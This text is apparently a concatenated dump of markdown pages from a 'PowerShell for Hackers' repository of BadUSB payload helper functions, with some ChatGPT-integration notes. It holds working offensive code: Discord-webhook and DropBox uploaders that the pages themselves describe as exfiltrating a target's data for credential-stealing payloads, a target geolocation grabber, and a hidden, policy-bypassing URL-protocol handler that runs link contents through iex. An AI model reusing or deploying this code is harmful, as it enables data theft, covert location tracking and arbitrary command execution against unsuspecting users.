        [Parameter (Mandatory = $False)]
        [Alias("t")]
        [string]$title,

        [Parameter (Mandatory = $False)]
        [Alias("b")]
        [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
        [string]$button,

        [Parameter (Mandatory = $False)]
        [Alias("i")]
        [ValidateSet('None','Hand','Question','Warning','Asterisk')]
        [string]$image
    )

    # Fill in the optional arguments that were left empty.
    if (-not $title)  { $title  = " " }
    if (-not $button) { $button = "OK" }
    if (-not $image)  { $image  = "None" }

    # System.Windows.MessageBox lives in the WPF assemblies.
    Add-Type -AssemblyName PresentationCore,PresentationFramework

    [System.Windows.MessageBox]::Show($message, $title, $button, $image)

}
```



82 | 83 | 84 | ## Examples 85 | [//]: # (Examples of scripts that have used your function) 86 | Listed below are payloads that have used one of these functions: 87 | 88 | None currently. Please feel free to submit a pull request and edit this line linking one of your payloads that have used this function. 89 | 90 | 91 |


92 | 93 | 94 | ## Contact 95 | 96 |


131 | 132 | 133 | ## Acknowledgments 134 | 135 | * [Hak5](https://hak5.org/) 136 | * [UberGuidoZ](https://github.com/UberGuidoZ) 137 | 138 | *** 139 | 140 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 141 | 142 |


143 | -------------------------------------------------------------------------------- /VideoNotes/ChatGPT-Powershell.md: -------------------------------------------------------------------------------- 1 | # Invoke-AIFunctionBuilder 2 | 3 | --- 4 | 5 | ## Usage 6 | 7 | https://user-images.githubusercontent.com/13159458/230610955-c37ad3e8-f12c-4802-83d5-20ed550f4a2c.mp4 8 | 9 | ### To launch the function builder interactively: 10 | ```pwsh 11 | Invoke-AIFunctionBuilder 12 | ``` 13 | ### To edit an existing function provide the text and a prompt that would be used to create it, the builder will correct any issues and validate it meets the prompt requirements: 14 | ```pwsh 15 | Invoke-AIFunctionBuilder -InitialFunction "function Say-Hello { Write-Host 'hello' }" -Prompt "Write a powershell function that will say hello" 16 | ``` 17 | 18 | ### The function builder is designed to run interactively so you can see the work the LLM is doing but if you want to you can run the function builder non-interactively with the `-NonInteractive` switch: 19 | ```pwsh 20 | "Write a powershell function that will list all available wifi networks" | Invoke-AIFunctionBuilder -NonInteractive 21 | ``` 22 | 23 | --- 24 | 25 | # Invoke-AIErrorHelper 26 | 27 | Invoke-AIErrorHelper is a function that uses the OpenAI GPT-3 API to provide insights into errors that occur in a PowerShell script. 28 | 29 | It takes the last error record and uses it to generate a detailed summary of the error and offer a potential PowerShell solution. 30 | 31 | The function is invoked by typing "Invoke-AIErrorHelper" or "ieh" into the PowerShell command line. 32 | 33 | If no error has occurred, the function will output a message saying "No error has occurred". 34 | 35 | ```powershell 36 | # Invoke-AIErrorHelper is a function that uses the OpenAI GPT-3 API to provide insights into errors that occur in a powershell script. 

Invoke-AIErrorHelper
```

---

# Generating Dalle Image

This is a PowerShell function that uses the OpenAI API to generate an image based on a description.

It takes two parameters, Description and Size, and an optional switch parameter, Raw, which will return the raw response from the API if set.

It also takes an optional switch parameter, NoProgress, which will hide the write-progress if set.

The function will convert the description to a JSON object and send it to the OpenAI API.

If the Raw parameter is not set, the function will save the image to a temporary file and return the path to that file.

```powershell
Get-DalleImage -Description "a cat in a rockband"
```

---

# Custom Functions

## Custom function to translate text to any language

```powershell
function Invoke-AiTranslate {
    # Builds a translation prompt from $text and $language and returns whatever
    # Get-GPT4Completion gives back for it.
    #   -text       Text to translate.
    #   -language   Target language, inserted into the prompt as written.
    #   -takeInput  Prompt on the console for the text instead of using -text.

    [CmdLetBinding()]
    param (

        [String]$text,
        [String]$language,
        [Switch]$takeInput
    )
    if($takeInput){
        # Read-Host overwrites any value passed through -text.
        $text = Read-Host " "
    }
    $response = Get-GPT4Completion -Content "can you translate the following text to $language : $text"
    return $response
}
```

## Explain My Payloads

### You can use this to pull down any script from github and have it explained to you

```powershell
# formatted with my shorturl for my payloads
# irm (Invoke-RestMethod) only downloads the script text here; it is handed to
# invoke-AIExplain as a value and is not executed.
# NOTE(review): a short URL can be re-pointed later; the expanded form below shows
# what is actually being fetched.

invoke-AIExplain -Value (irm jakoby.lol/voicelogger)

# Same command with the URL expanded

invoke-AIExplain -Value (irm https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/VoiceLogger/VL.ps1)
```

### Ai Powered Portscan

This is an example of how easy it is to do a general query and pass it off to Ai for analyzing



```powershell
# Lists the unique local/remote port pairs of TCP connections in the Established
# state. Listening ports are not part of this result, so it is a view of active
# connections rather than of all open ports.

$ports = Get-NetTCPConnection | Where-Object { $_.State -eq 'Established' } | Select-Object LocalPort, RemotePort | Sort-Object LocalPort, RemotePort -Unique

# Example array for this demo (replaces the query result above)

$ports = @('22' , '53')
```

---

```powershell
# Custom function to load array of ports into custom prompt to generate a security report

function Invoke-portReport ($ports){
    # The prompt sent to Get-GPT4Completion contains today's date, the local user
    # name and the port list.
    # NOTE(review): Get-GPT4Completion is not defined on this page; presumably the
    # prompt, including the user name, leaves the machine for an external API.
    $date = Get-Date -Format "yyyy-MM-dd"
    $name = $env:username
    # The reply is stored in the script-scope variable $portReport; nothing is returned.
    $Script:portReport = Get-GPT4Completion -Content "can you generate a pentesting report inserting the $date and $name highlighting the dangers of having the following ports open: $ports"
}
```

---



--------------------------------------------------------------------------------
/Functions/txt-img.md:
--------------------------------------------------------------------------------
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. Syntax
  4. 9 |
  5. The Function
  6. 10 |
  7. Examples
  8. 11 |
  9. Contact
  10. 12 |
  11. Acknowledgments
  12. 13 |
14 |
15 | 16 | # Text to Image 17 | 18 |

19 | 20 | Golang 21 | 22 |
YouTube Tutorial 23 |

24 | 25 | ## Description 26 | 27 | This function will convert a text file to an image 28 | 29 | ## [SYNTAX] 30 | 31 | ### Encode an Image 32 | ``` 33 | txt-img -txtPath "C:\Users\User\Desktop\text.txt" -imgPath "C:\Users\User\Desktop\img.jpg" 34 | ``` 35 | 36 | ## The Function 37 | 38 | ### [txt-img] 39 | 40 | This function will convert your text file to an image 41 | 42 | Use the txtPath tag to provide the path of the text file you are trying to convert 43 | 44 | Using the imgPath parameter will set where the image is saved to and what it is saved as 45 | 46 | If no imgPath is designated it will save it to the desktop with the name foo.jpg by default 47 | 48 | ``` 49 | function txt-img { 50 | [CmdletBinding()] 51 | param ( 52 | 53 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 54 | [string]$txtPath, 55 | 56 | [Parameter (Mandatory = $False)] 57 | [string]$imgPath 58 | ) 59 | 60 | if (!$imgPath) {$imgPath = "$Env:USERPROFILE\Desktop\foo.jpg"} 61 | 62 | $content = [IO.File]::ReadAllText($txtPath) 63 | Add-Type -AssemblyName System.Drawing 64 | $bmp = new-object System.Drawing.Bitmap 1920,1080 65 | $font = new-object System.Drawing.Font Consolas,18 66 | $brushBg = [System.Drawing.Brushes]::White 67 | $brushFg = [System.Drawing.Brushes]::Black 68 | $graphics = [System.Drawing.Graphics]::FromImage($bmp) 69 | $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) 70 | $graphics.DrawString($content,$font,$brushFg,500,100) 71 | $graphics.Dispose() 72 | $bmp.Save($imgPath) 73 | } 74 | ``` 75 | 76 |

(back to top)

77 | 78 | 79 | ## Examples 80 | 81 | Listed below are payloads that have used one of these functions: 82 | 83 | [Wallpaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 84 | 85 |

(back to top)

86 | 87 | 88 | ## Contact 89 | 90 |

📱 My Socials 📱

91 |

(back to top)

125 | 126 | 127 | ## Acknowledgments 128 | 129 | * [Hak5](https://hak5.org/) 130 | * [UberGuidoZ](https://github.com/UberGuidoZ) 131 | 132 | *** 133 | 134 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 135 | 136 |

(back to top)

137 | -------------------------------------------------------------------------------- /Functions/Discord-Upload.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
14 | 15 | # Discord-Upload 16 | 17 |

18 | 19 | C# 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function is used to upload either text or other files to your discord via a webhook 27 | 28 | ## The Functions 29 | 30 | 31 | ### [Upload-Discord] 32 | 33 | This function is used to upload files to your discord. 34 | 35 | Just replace `$hookurl` with YOUR discord webhook 36 | 37 | Now you can use either of the `$text` or `$file` parameter or both 38 | 39 | ``` 40 | function Upload-Discord { 41 | 42 | [CmdletBinding()] 43 | param ( 44 | [parameter(Position=0,Mandatory=$False)] 45 | [string]$file, 46 | [parameter(Position=1,Mandatory=$False)] 47 | [string]$text 48 | ) 49 | 50 | $hookurl = 'YOUR-DISCORD-WEBHOOK' 51 | 52 | $Body = @{ 53 | 'username' = $env:username 54 | 'content' = $text 55 | } 56 | 57 | if (-not ([string]::IsNullOrEmpty($text))){ 58 | Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; 59 | 60 | if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} 61 | } 62 | ``` 63 | 64 | ---------------------------------------------------------------------------------------------------------------------------------- 65 | ### [Syntax] 66 | ``` 67 | Upload-Discord -file "file.txt" -text "this is a text file" 68 | 69 | or 70 | 71 | Upload-Discord -file "image.jpg" -text "this is an iamge" 72 | ``` 73 | 74 | 75 |

(back to top)

76 | 77 | 78 | ## Examples 79 | 80 | Listed below are payloads that can use one of these functions: 81 | 82 | [ADV-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 83 | 84 | [ET-Phone-Home](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ET-Phone-Home) 85 | 86 | [Credz-Plz](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Credz-Plz) 87 | 88 |

(back to top)

89 | 90 | 91 | ## Contact 92 | 93 |

📱 My Socials 📱

94 |

(back to top)

128 | 129 | 130 | ## Acknowledgments 131 | 132 | * [Hak5](https://hak5.org/) 133 | * [UberGuidoZ](https://github.com/UberGuidoZ) 134 | 135 | *** 136 | 137 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 138 | 139 |

(back to top)

140 | -------------------------------------------------------------------------------- /Functions/Abuse-CapsLock.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Functions
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
14 | 15 | # Abuse-CapsLock 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | These few functions will be different ways that you can take advantage of the CapsLock button 27 | 28 | ## The Functions 29 | 30 | ### [Caps-Indicator] 31 | 32 | This function is meant to serve as an indicator for stages of your scripts 33 | Using the following function will make the capslock light blink on and off the number of times the $blinks parameter indicates 34 | The pause after each key press is set in milliseconds by the $pause parameter (the function passes it to Start-Sleep -Milliseconds) 35 | Use the following syntax: 36 | (blinks 3 times, pausing 250 milliseconds after each toggle) 37 | 38 | ``` 39 | Caps-Indicator -pause 250 -blinks 3 40 | ``` 41 | 42 | ``` 43 | function Caps-Indicator { 44 | 45 | [CmdletBinding()] 46 | param ( 47 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 48 | [string]$pause, 49 | 50 | [Parameter (Mandatory = $True)] 51 | [int]$blinks 52 | ) 53 | 54 | $o=New-Object -ComObject WScript.Shell 55 | for($i = 1; $i -le $blinks * 2; $i++) { 56 | $o.SendKeys("{CAPSLOCK}");Start-Sleep -Milliseconds $pause 57 | } 58 | } 59 | ``` 60 | 61 | ### [Caps-Off] 62 | 63 | This function will make sure capslock is turned back off if one of your other scripts leaves it on 64 | 65 | ``` 66 | function Caps-Off { 67 | Add-Type -AssemblyName System.Windows.Forms 68 | $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') 69 | 70 | #If true, toggle CapsLock key, to ensure that the script doesn't fail 71 | if ($caps -eq $true){ 72 | 73 | $key = New-Object -ComObject WScript.Shell 74 | $key.SendKeys('{CapsLock}') 75 | } 76 | } 77 | ``` 78 | 79 |

(back to top)

80 | 81 | 82 | ## Examples 83 | 84 | Listed below are payloads that have used one of these functions: 85 | 86 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 87 | 88 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 89 | 90 | 91 |

(back to top)

92 | 93 | 94 | ## Contact 95 | 96 |

📱 My Socials 📱

97 |

(back to top)

131 | 132 | 133 | ## Acknowledgments 134 | 135 | * [Hak5](https://hak5.org/) 136 | * [UberGuidoZ](https://github.com/UberGuidoZ) 137 | 138 | *** 139 | 140 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 141 | 142 |

(back to top)

143 | -------------------------------------------------------------------------------- /VideoNotes/psChat.md: -------------------------------------------------------------------------------- 1 | ```powershell 2 | # Load necessary assembly for Windows Forms 3 | Add-Type -AssemblyName System.Windows.Forms 4 | 5 | # Create the main form with dark background 6 | $form = New-Object System.Windows.Forms.Form 7 | $form.Text = 'Chat Room' 8 | $form.Size = New-Object System.Drawing.Size(500, 400) # Adjusted form size to accommodate buttons 9 | $form.BackColor = [System.Drawing.Color]::FromArgb(45, 45, 48) 10 | $form.AutoScaleMode = 'Dpi' 11 | 12 | # Create a RichTextBox for displaying messages with dark theme 13 | $richTextBoxDisplay = New-Object System.Windows.Forms.RichTextBox 14 | $richTextBoxDisplay.Location = New-Object System.Drawing.Point(10, 10) 15 | $richTextBoxDisplay.Size = New-Object System.Drawing.Size(360, 280) 16 | $richTextBoxDisplay.Anchor = 'Top,Left,Right,Bottom' 17 | $richTextBoxDisplay.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 18 | $richTextBoxDisplay.ForeColor = [System.Drawing.Color]::WhiteSmoke 19 | $form.Controls.Add($richTextBoxDisplay) 20 | 21 | # Create a textbox for typing messages with dark theme 22 | $textBoxInput = New-Object System.Windows.Forms.TextBox 23 | $textBoxInput.Location = New-Object System.Drawing.Point(10, 300) 24 | $textBoxInput.Size = New-Object System.Drawing.Size(260, 20) 25 | $textBoxInput.Anchor = 'Bottom,Left,Right' 26 | $textBoxInput.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 27 | $textBoxInput.ForeColor = [System.Drawing.Color]::WhiteSmoke 28 | $form.Controls.Add($textBoxInput) 29 | 30 | # Create a button for sending messages with dark theme 31 | $buttonSend = New-Object System.Windows.Forms.Button 32 | $buttonSend.Location = New-Object System.Drawing.Point(280, 300) 33 | $buttonSend.Size = New-Object System.Drawing.Size(90, 20) 34 | $buttonSend.Anchor = 'Bottom,Right' 35 | $buttonSend.Text = 
'Send' 36 | $buttonSend.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 37 | $buttonSend.ForeColor = [System.Drawing.Color]::WhiteSmoke 38 | $form.Controls.Add($buttonSend) 39 | 40 | # Add an event handler for the Send button 41 | $buttonSend.Add_Click({ 42 | $richTextBoxDisplay.AppendText("You: $($textBoxInput.Text)`r`n") 43 | $textBoxInput.Clear() 44 | $richTextBoxDisplay.ScrollToCaret() 45 | }) 46 | 47 | # Create a StatusStrip for the bottom of the form 48 | $statusStrip = New-Object System.Windows.Forms.StatusStrip 49 | $statusStrip.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 50 | $statusLabel1 = New-Object System.Windows.Forms.ToolStripStatusLabel 51 | $statusLabel1.Text = "Status: " 52 | $statusLabel1.ForeColor = [System.Drawing.Color]::White 53 | $statusLabel2 = New-Object System.Windows.Forms.ToolStripStatusLabel 54 | $statusLabel2.Text = "Connected ✅" 55 | $statusLabel2.ForeColor = [System.Drawing.Color]::GreenYellow 56 | $statusStrip.Items.Add($statusLabel1) 57 | $statusStrip.Items.Add($statusLabel2) 58 | $form.Controls.Add($statusStrip) 59 | 60 | # Define button properties 61 | $buttonWidth = 80 62 | $buttonHeight = 20 63 | $initialButtonTop = 10 64 | $buttonSpacing = 40 65 | 66 | # Function to create a button 67 | function Create-Button { 68 | param ($text, $top) 69 | $button = New-Object System.Windows.Forms.Button 70 | $button.Location = New-Object System.Drawing.Point(400, $top) 71 | $button.Size = New-Object System.Drawing.Size($buttonWidth, $buttonHeight) 72 | $button.Anchor = 'Top,Right' # Anchor set to Top and Right 73 | $button.Text = $text 74 | $button.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 75 | $button.ForeColor = [System.Drawing.Color]::WhiteSmoke 76 | return $button 77 | } 78 | 79 | # Create and add buttons 80 | $buttonSearch = Create-Button -text 'Search' -top $initialButtonTop 81 | $form.Controls.Add($buttonSearch) 82 | 83 | $buttonSendFile = Create-Button -text 'Send File' -top ($initialButtonTop + 
$buttonSpacing) 84 | $form.Controls.Add($buttonSendFile) 85 | 86 | $buttonClearChat = Create-Button -text 'Clear Chat' -top ($initialButtonTop + 2 * $buttonSpacing) 87 | $form.Controls.Add($buttonClearChat) 88 | 89 | $buttonSettings = Create-Button -text 'Settings' -top ($initialButtonTop + 3 * $buttonSpacing) 90 | $form.Controls.Add($buttonSettings) 91 | 92 | # Event handlers for buttons (placeholders for actual functionality) 93 | #$buttonSearch.Add_Click({ # Add search functionality here }) 94 | #$buttonSendFile.Add_Click({ # Add file sending functionality here }) 95 | #$buttonClearChat.Add_Click({ $richTextBoxDisplay.Clear() }) 96 | #$buttonSettings.Add_Click({ # Add settings functionality here }) 97 | 98 | # Show the form 99 | $form.ShowDialog() 100 | ``` 101 | 102 | -------------------------------------------------------------------------------- /Functions/Url-2-Ascii.md: -------------------------------------------------------------------------------- 1 | ## Extract the URI from the command-line arguments 2 | 3 | ```powershell 4 | $webURL = $args[0] 5 | ``` 6 | 7 | ## Registry Key Value 8 | ```powershell 9 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoP -Ep Bypass -File "C:\temp\myhandler.ps1" "%1" 10 | ``` 11 | 12 | ## URL ENCODING EXAMPLE 13 | ``` 14 | https://example.com/search?q=hello world&category=books?sort=asc 15 | 16 | 17 | https://example.com/search?q=hello%20world%26category=books%3Fsort=asc 18 | ``` 19 | 20 | 21 | ## Define a function to convert URL-encoded characters to their ASCII value 22 | ```powershell 23 | function Convert-UrlEncodedToAscii { 24 | param( 25 | [Parameter(Mandatory=$true)][string]$UrlEncodedString 26 | ) 27 | 28 | # Decode the URL-encoded string to plain text 29 | $decoded = [System.Uri]::UnescapeDataString($UrlEncodedString) 30 | 31 | # Define a regular expression to match URL-encoded characters 32 | $regex = '%([0-9a-fA-F]{2})' 33 | 34 | # Loop through all matches of URL-encoded characters and replace 
them with their ASCII value 35 | $asciiString = "" 36 | ([regex]$regex).Matches($decoded) | ForEach-Object { 37 | $asciiValue = [int][byte]::Parse($_.Groups[1].Value, "HexNumber") 38 | $asciiString += [char]$asciiValue 39 | } 40 | 41 | # Remove all URL-encoded characters from the decoded string 42 | $remainingString = $decoded.Replace($regex, '') 43 | 44 | # Trim the string up to the first occurrence of "//" 45 | $index = $remainingString.IndexOf("//") 46 | if ($index -ge 0) { 47 | $remainingString = $remainingString.Substring($index + 2) 48 | } 49 | 50 | # Combine the ASCII string and the remaining string 51 | $decodeOutput = $asciiString + $remainingString 52 | 53 | # Trim the last character from the string 54 | $decodeOutput = $decodeOutput.Substring(0, $decodeOutput.Length - 1) 55 | 56 | # Return the decoded and trimmed string 57 | return $decodeOutput 58 | } 59 | ``` 60 | Note: `UnescapeDataString` has already decoded every `%XX` sequence before the match loop runs, and `String.Replace` treats `$regex` as literal text rather than a pattern, so the loop and the removal step normally change nothing; the result is the decoded string after the first `//`, minus its last character. 61 | 62 | ## Call the function to convert the URL-encoded characters in the input URL to ASCII 63 | ```powershell 64 | $fullASCII = Convert-UrlEncodedToAscii $webURL 65 | ``` 66 | 67 | ## Output the decoded and trimmed string in red text (DEBUGGING) 68 | ```powershell 69 | Write-Host $fullASCII -ForegroundColor Red 70 | ``` 71 | 72 | ## Execute a PowerShell command using the decoded and trimmed string as input 73 | ```powershell 74 | $CMD = "powershell.exe -noexit $fullASCII" 75 | $CMD | iex 76 | ``` 77 | The decoded URL reaches `iex` with no validation, so anything after the scheme in a link runs as a command. On a monitored host this appears as `powershell.exe` started with the `-w h -NoP -Ep Bypass -File` arguments from the registry value above, and the decoded command is recorded by script block logging where it is enabled. 78 | 79 | # Full Code 80 | 81 | ```powershell 82 | # Extract the URI from the command-line arguments 83 | $webURL = $args[0] 84 | 85 | #$UrlEncodedString | clip 86 | 87 | # Define a function to convert URL-encoded characters to their ASCII value 88 | function Convert-UrlEncodedToAscii { 89 | param( 90 | [Parameter(Mandatory=$true)][string]$UrlEncodedString 91 | ) 92 | 93 | # Decode the URL-encoded string to plain text 94 | $decoded = [System.Uri]::UnescapeDataString($UrlEncodedString) 95 | 96 | # Define a regular expression to match URL-encoded characters 97 | $regex = '%([0-9a-fA-F]{2})' 98
| 99 | # Loop through all matches of URL-encoded characters and replace them with their ASCII value 100 | $asciiString = "" 101 | ([regex]$regex).Matches($decoded) | ForEach-Object { 102 | $asciiValue = [int][byte]::Parse($_.Groups[1].Value, "HexNumber") 103 | $asciiString += [char]$asciiValue 104 | } 105 | 106 | # Remove all URL-encoded characters from the decoded string 107 | $remainingString = $decoded.Replace($regex, '') 108 | 109 | # Trim the string up to the first occurrence of "//" 110 | $index = $remainingString.IndexOf("//") 111 | if ($index -ge 0) { 112 | $remainingString = $remainingString.Substring($index + 2) 113 | } 114 | 115 | # Combine the ASCII string and the remaining string 116 | $decodeOutput = $asciiString + $remainingString 117 | 118 | # Trim the last character from the string 119 | $decodeOutput = $decodeOutput.Substring(0, $decodeOutput.Length - 1) 120 | 121 | # Return the decoded and trimmed string 122 | return $decodeOutput 123 | } 124 | 125 | # Call the function to convert the URL-encoded characters in the input URL to ASCII 126 | $fullASCII = Convert-UrlEncodedToAscii $webURL 127 | 128 | # Output the decoded and trimmed string in red text 129 | Write-Host $fullASCII -ForegroundColor Red 130 | 131 | # Execute a PowerShell command using the decoded and trimmed string as input 132 | $CMD = "powershell.exe -noexit $fullASCII" 133 | $CMD | iex 134 | ``` 135 | -------------------------------------------------------------------------------- /Functions/Get-GeoLocation.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
14 | 15 | # Get-GeoLocation 16 | 17 |

18 | 19 | C# 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function will get the geo-location of your target 27 | 28 | ## The Function 29 | 30 | ### [Get-GeoLocation] 31 | 32 | Using the Geo-Watcher function you will get the location of your Target saved to the variable $GL 33 | 34 | Latitude and Longitude will be saved individually to the the following variables $Lat and $Lon 35 | 36 | ``` 37 | function Get-GeoLocation{ 38 | try { 39 | Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace 40 | $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object 41 | $GeoWatcher.Start() #Begin resolving current locaton 42 | 43 | while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { 44 | Start-Sleep -Milliseconds 100 #Wait for discovery. 45 | } 46 | 47 | if ($GeoWatcher.Permission -eq 'Denied'){ 48 | Write-Error 'Access Denied for Location Information' 49 | } else { 50 | $GL = $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. 51 | $GL = $GL -split " " 52 | $Lat = $GL[0].Substring(11) -replace ".$" 53 | $Lon = $GL[1].Substring(10) -replace ".$" 54 | return $Lat, $Lon 55 | 56 | 57 | } 58 | } 59 | # Write Error is just for troubleshooting 60 | catch {Write-Error "No coordinates found" 61 | return "No Coordinates found" 62 | -ErrorAction SilentlyContinue 63 | } 64 | 65 | } 66 | 67 | $Lat, $Lon = Get-GeoLocation 68 | ``` 69 | 70 | 71 | Going a step further we can use [Start-Process] to open a tab in the browser with a map of their current location 72 | 73 | by navigating to the following URL with the $Lon and $Lat variable plugged into it 74 | 75 | ``` 76 | Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon" 77 | ``` 78 | That image will look something like this: 79 | 80 | ![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-We-Found-You/location.jpg) 81 | 82 |

(back to top)

83 | 84 | 85 | ## Examples 86 | 87 | Listed below are payloads that have used one of these functions: 88 | 89 | [We-Found-You](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-We-Found-You) 90 | 91 | 92 |

(back to top)

93 | 94 | 95 | ## Contact 96 | 97 |

📱 My Socials 📱

98 |

(back to top)

132 | 133 | 134 | ## Acknowledgments 135 | 136 | * [Hak5](https://hak5.org/) 137 | * [UberGuidoZ](https://github.com/UberGuidoZ) 138 | 139 | 140 |

(back to top)

141 | -------------------------------------------------------------------------------- /Functions/DropBox-Upload.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
14 | 15 | # DropBox-Upload 16 | 17 |

18 | 19 | C# 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function is used to exfiltrate gathered data to DropBox 27 | 28 | ## The Function 29 | 30 | ### [DropBox-Upload] 31 | 32 | First off for this function to work you need to have a DropBox account. Make one [HERE](https://www.dropbox.com). 33 | 34 | Follow this [GUIDE](https://developers.dropbox.com/oauth-guide) for setting up your DropBox account for uploads 35 | 36 | Use the following syntax for your upload (the function declares its parameter as `$SourceFilePath` with the alias `f`, so the named form that binds is `-SourceFilePath` or `-f`; `-FileName` below is not a declared name): 37 | 38 | ``` 39 | DropBox-Upload -FileName "file.txt" 40 | 41 | or 42 | 43 | "file.txt" | DropBox-Upload 44 | ``` 45 | 46 | Make sure to plug in your newly acquired DropBox token in the $DropBoxAccessToken variable below 47 | 48 | (this function will exfiltrate a file from your target's temp directory so make sure you save your acquired data to the same directory) 49 | 50 | ``` 51 | function DropBox-Upload { 52 | 53 | [CmdletBinding()] 54 | param ( 55 | 56 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 57 | [Alias("f")] 58 | [string]$SourceFilePath 59 | ) 60 | $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE" # Replace with your DropBox Access Token 61 | $outputFile = Split-Path $SourceFilePath -leaf 62 | $TargetFilePath="/$outputFile" 63 | $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' 64 | $authorization = "Bearer " + $DropBoxAccessToken 65 | $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" 66 | $headers.Add("Authorization", $authorization) 67 | $headers.Add("Dropbox-API-Arg", $arg) 68 | $headers.Add("Content-Type", 'application/octet-stream') 69 | Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers 70 | } 71 | ``` 72 | 73 |

(back to top)

74 | 75 | 76 | ## Examples 77 | 78 | Listed below are payloads that have used one of these functions: 79 | 80 | [ADV-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 81 | 82 | [ET-Phone-Home](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ET-Phone-Home) 83 | 84 | [Credz-Plz](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Credz-Plz) 85 | 86 |

(back to top)

87 | 88 | 89 | ## Contact 90 | 91 |

📱 My Socials 📱

92 |

(back to top)

126 | 127 | 128 | ## Acknowledgments 129 | 130 | * [Hak5](https://hak5.org/) 131 | * [UberGuidoZ](https://github.com/UberGuidoZ) 132 | 133 | *** 134 | 135 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 136 | 137 |

(back to top)

138 | -------------------------------------------------------------------------------- /Functions/Invoke-WebRequest.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Examples
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
